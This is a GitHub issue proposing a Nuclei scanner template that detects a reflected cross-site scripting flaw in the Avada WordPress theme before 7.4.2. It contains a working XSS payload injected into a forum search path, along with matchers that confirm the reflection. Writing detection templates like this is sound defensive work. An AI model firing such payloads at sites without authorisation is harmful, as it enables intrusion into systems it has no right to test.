### ISSUE TITLE
Avada XSS

### ISSUE THREAD

**Issue by Akincibor** [projectdiscovery/nuclei-templates#4214]
```yaml
id: avada-xss

info:
  name: Avada < 7.4.2 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue.
  reference: https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
  tags: xss,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/forums/search/z--><font color=blue><h1>FAIL<img src onerror=alert(document.domain)>/'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<img src onerror=alert(document.domain)>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header
```
